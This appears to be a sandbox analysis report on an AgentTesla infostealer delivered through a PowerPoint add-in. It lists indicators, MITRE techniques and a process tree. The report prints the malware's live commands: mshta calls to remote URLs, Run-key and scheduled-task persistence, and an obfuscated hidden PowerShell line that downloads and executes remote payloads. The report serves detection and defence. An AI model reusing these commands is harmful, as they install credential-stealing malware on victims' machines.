agenttesla | 6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674

General

Target

SHIPMENT DOC_pdf.ppam
Size

8KB
MD5

e49c885d3236afa32adef83e8a201573
SHA1

f8e63da458adee3ece85529ddeba477a07087430
SHA256

6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674
SHA512

7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4404	3504	mshta.exe	POWERPNT.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2276-334-0x000000000043751E-mapping.dmp	family_agenttesla
behavioral2/memory/536-403-0x000000000043751E-mapping.dmp	family_agenttesla

Blocklisted process makes network request 15 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
29	4404	mshta.exe
31	4404	mshta.exe
33	4404	mshta.exe
35	4404	mshta.exe
37	4404	mshta.exe
39	4404	mshta.exe
43	4404	mshta.exe
45	4404	mshta.exe
47	4404	mshta.exe
50	4404	mshta.exe
51	4404	mshta.exe
52	4404	mshta.exe
53	4404	mshta.exe
55	4404	mshta.exe
57	4732	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 4732 set thread context of 2276	4732	powershell.exe	jsc.exe
PID 4732 set thread context of 536	4732	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEmshta.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mshta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mshta.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1344 schtasks.exe

pid	process
1344	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4948 taskkill.exe
2372 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3504 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exedw20.exejsc.exeRegAsm.exe

pid process

4732 powershell.exe
4732 powershell.exe
2160 dw20.exe
2160 dw20.exe
4732 powershell.exe
2276 jsc.exe
2276 jsc.exe
536 RegAsm.exe
536 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

536 RegAsm.exe

pid	process
4948	taskkill.exe
2372	taskkill.exe

pid	process
3504	POWERPNT.EXE

pid	process
4732	powershell.exe
4732	powershell.exe
2160	dw20.exe
2160	dw20.exe
4732	powershell.exe
2276	jsc.exe
2276	jsc.exe
536	RegAsm.exe
536	RegAsm.exe

pid	process
536	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	4948	taskkill.exe
Token: SeDebugPrivilege	2372	taskkill.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	2276	jsc.exe
Token: SeDebugPrivilege	536	RegAsm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

POWERPNT.EXE

pid process

3504 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

POWERPNT.EXEmshta.exeRegAsm.exejsc.exe

pid process

3504 POWERPNT.EXE
3504 POWERPNT.EXE
3504 POWERPNT.EXE
4404 mshta.exe
536 RegAsm.exe
2276 jsc.exe

pid	process
3504	POWERPNT.EXE

pid	process
3504	POWERPNT.EXE
3504	POWERPNT.EXE
3504	POWERPNT.EXE
4404	mshta.exe
536	RegAsm.exe
2276	jsc.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 3504 wrote to memory of 4404	3504	POWERPNT.EXE	mshta.exe
PID 3504 wrote to memory of 4404	3504	POWERPNT.EXE	mshta.exe
PID 4404 wrote to memory of 4948	4404	mshta.exe	taskkill.exe
PID 4404 wrote to memory of 4948	4404	mshta.exe	taskkill.exe
PID 4404 wrote to memory of 2372	4404	mshta.exe	taskkill.exe
PID 4404 wrote to memory of 2372	4404	mshta.exe	taskkill.exe
PID 4404 wrote to memory of 4732	4404	mshta.exe	powershell.exe
PID 4404 wrote to memory of 4732	4404	mshta.exe	powershell.exe
PID 4404 wrote to memory of 1344	4404	mshta.exe	schtasks.exe
PID 4404 wrote to memory of 1344	4404	mshta.exe	schtasks.exe
PID 4404 wrote to memory of 2160	4404	mshta.exe	dw20.exe
PID 4404 wrote to memory of 2160	4404	mshta.exe	dw20.exe
PID 4732 wrote to memory of 2276	4732	powershell.exe	jsc.exe
PID 4732 wrote to memory of 2276	4732	powershell.exe	jsc.exe
PID 4732 wrote to memory of 2276	4732	powershell.exe	jsc.exe
PID 4732 wrote to memory of 2276	4732	powershell.exe	jsc.exe
PID 4732 wrote to memory of 2276	4732	powershell.exe	jsc.exe
PID 4732 wrote to memory of 2276	4732	powershell.exe	jsc.exe
PID 4732 wrote to memory of 2276	4732	powershell.exe	jsc.exe
PID 4732 wrote to memory of 2276	4732	powershell.exe	jsc.exe
PID 4732 wrote to memory of 4720	4732	powershell.exe	csc.exe
PID 4732 wrote to memory of 4720	4732	powershell.exe	csc.exe
PID 4720 wrote to memory of 4640	4720	csc.exe	cvtres.exe
PID 4720 wrote to memory of 4640	4720	csc.exe	cvtres.exe
PID 4732 wrote to memory of 536	4732	powershell.exe	RegAsm.exe
PID 4732 wrote to memory of 536	4732	powershell.exe	RegAsm.exe
PID 4732 wrote to memory of 536	4732	powershell.exe	RegAsm.exe
PID 4732 wrote to memory of 536	4732	powershell.exe	RegAsm.exe
PID 4732 wrote to memory of 536	4732	powershell.exe	RegAsm.exe
PID 4732 wrote to memory of 536	4732	powershell.exe	RegAsm.exe
PID 4732 wrote to memory of 536	4732	powershell.exe	RegAsm.exe
PID 4732 wrote to memory of 536	4732	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\SHIPMENT DOC_pdf.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/12.html\""
3⤵
- Creates scheduled task(s)
PID:1344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_win_path
PID:2276

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qxmfby5g\qxmfby5g.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4720

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39B9.tmp" "c:\Users\Admin\AppData\Local\Temp\qxmfby5g\CSCF07E4FBF968B4B609785B2BC5720E0D2.TMP"
5⤵
PID:4640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
PID:536

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 812
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES39B9.tmp

MD5
68d5f70975dcf58f1e3eb8e8cd9b8424

SHA1
561835ef57f326cfecff5bfad9fa471df0d759dd

SHA256
4cae5b8683e34bd7829ec70e1bf067800972b6b8651ef0d678e3db8f3307a85c

SHA512
b39422cfb28108e62f2e1be146dc4713f2d5aca49ad10faebf5844650665c2cbeb19ad7db5c3d9713915db6015f48e9cbdb40faeb4398f42cd070763737c094c

Download Submit
C:\Users\Admin\AppData\Local\Temp\qxmfby5g\qxmfby5g.dll

MD5
d98eae14e70cf736456f64ef449cea10

SHA1
be1b00401e3732b2987f80f5d3961a9444450077

SHA256
31065da5521e16c1b010675cea237ad79141e96a2284d3b2f99cf1d0ddbbaac3

SHA512
30f0a0c1bf610e569e89ed94101bd46948b35be3113f984935fc4f501be1042809c33d8db10d6bbb572785593095e23ebc0575d2bbd931ebc1f9b1ca2cdc3174

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qxmfby5g\CSCF07E4FBF968B4B609785B2BC5720E0D2.TMP

MD5
2db7a644c347d4d34c2020d2e25ecc72

SHA1
af5500dffc2a21fdd7450995a0f8306f4c6edfbb

SHA256
13fdf7f9a9d9ec793f62279a5c4bf632f587e58750f0e6845850508724747a1f

SHA512
a1e67071ea1ee7c707594d351790c2dae2aed06426b729846d2a20cebfb870ba16c75d7cdfd51126db6b62726fb9b244daf142edd73eb72c014a0919b39a57f6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qxmfby5g\qxmfby5g.0.cs

MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qxmfby5g\qxmfby5g.cmdline

MD5
e7160c105a42a7ae8ef72fc4b953e1b0

SHA1
2751288d8c3ae6eadcfa9de44eb9403d8e3d0031

SHA256
d915530999de28b9d17763155584ee09828827804eb98d6bb0c2ed68db47c1d1

SHA512
7a14f5f7f99b4242abe179816a972cabbe88f7a0761909ca21a3b9501361822097459363e685bc053ef1a490cfb345a289dc02f633e764e8e25cd3d0342e2893

Download Submit
memory/536-419-0x0000000004881000-0x0000000004882000-memory.dmp

Filesize
4KB

Download
memory/536-409-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/536-403-0x000000000043751E-mapping.dmp

Download
memory/1344-309-0x0000000000000000-mapping.dmp

Download
memory/2160-318-0x0000000000000000-mapping.dmp

Download
memory/2276-418-0x00000000053D1000-0x00000000053D2000-memory.dmp

Filesize
4KB

Download
memory/2276-393-0x00000000053D0000-0x00000000053D1000-memory.dmp

Filesize
4KB

Download
memory/2276-334-0x000000000043751E-mapping.dmp

Download
memory/2372-307-0x0000000000000000-mapping.dmp

Download
memory/3504-116-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/3504-115-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/3504-117-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/3504-118-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/3504-120-0x000001C21C770000-0x000001C21C772000-memory.dmp

Filesize
8KB

Download
memory/3504-119-0x000001C21C770000-0x000001C21C772000-memory.dmp

Filesize
8KB

Download
memory/3504-258-0x000001C22DA40000-0x000001C22DA44000-memory.dmp

Filesize
16KB

Download
memory/3504-122-0x000001C21C770000-0x000001C21C772000-memory.dmp

Filesize
8KB

Download
memory/3504-121-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/4404-269-0x0000000000000000-mapping.dmp

Download
memory/4640-397-0x0000000000000000-mapping.dmp

Download
memory/4720-394-0x0000000000000000-mapping.dmp

Download
memory/4732-327-0x000001BB27F26000-0x000001BB27F28000-memory.dmp

Filesize
8KB

Download
memory/4732-326-0x000001BB27F23000-0x000001BB27F25000-memory.dmp

Filesize
8KB

Download
memory/4732-325-0x000001BB27F20000-0x000001BB27F22000-memory.dmp

Filesize
8KB

Download
memory/4732-308-0x0000000000000000-mapping.dmp

Download
memory/4948-306-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads